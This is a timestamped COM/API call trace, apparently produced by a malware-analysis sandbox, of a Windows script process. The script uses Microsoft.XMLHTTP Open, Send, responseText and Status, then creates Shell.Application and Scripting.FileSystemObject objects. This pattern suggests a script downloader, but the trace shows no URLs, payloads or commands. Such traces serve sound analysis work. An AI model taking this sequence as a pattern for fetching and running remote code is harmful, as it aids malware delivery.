	[0624.738] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0624.738] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0624.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0624.738] ??2@YAPEAX_K@Z () returned 0x62f330
	[0624.738] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0624.738] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0624.738] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0624.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0624.738] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0624.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0624.739] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0624.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0624.739] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0624.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0624.908] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0624.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0624.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0624.909] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0624.909] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0624.909] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0624.909] SysStringLen (param_1=0x0) returned 0x0
	[0624.909] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0624.909] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0624.909] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0624.909] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0624.909] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0624.909] ??2@YAPEAX_K@Z () returned 0x62f350
	[0624.909] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0624.909] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0624.910] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0624.910] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0624.910] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0624.910] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0624.910] SysStringLen (param_1=0x0) returned 0x0
	[0624.910] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0624.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0624.913] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0624.913] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0624.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0624.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0624.913] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0629.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0629.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0629.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0629.783] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0629.783] SysStringLen (param_1=0x0) returned 0x0
	[0629.783] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0629.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0629.783] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0629.783] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0629.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0629.783] ??2@YAPEAX_K@Z () returned 0x62f330
	[0629.783] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0629.783] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0629.783] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0629.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0629.784] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0629.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0629.784] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0629.787] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0629.788] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0629.788] SysStringLen (param_1=0x0) returned 0x0
	[0629.788] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0629.788] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0629.788] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0629.788] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0629.788] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0629.788] ??2@YAPEAX_K@Z () returned 0x62f310
	[0629.788] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0629.788] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0629.788] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0629.788] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0629.788] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0629.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0629.789] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0629.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0629.789] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0629.789] SysStringLen (param_1=0x0) returned 0x0
	[0629.789] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0629.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0629.789] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0629.789] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0629.789] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0629.790] ??2@YAPEAX_K@Z () returned 0x62f330
	[0629.790] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0629.790] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0629.790] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0629.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0629.790] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0629.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0629.790] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0629.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0629.790] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0629.790] SysStringLen (param_1=0x0) returned 0x0
	[0629.791] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0629.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
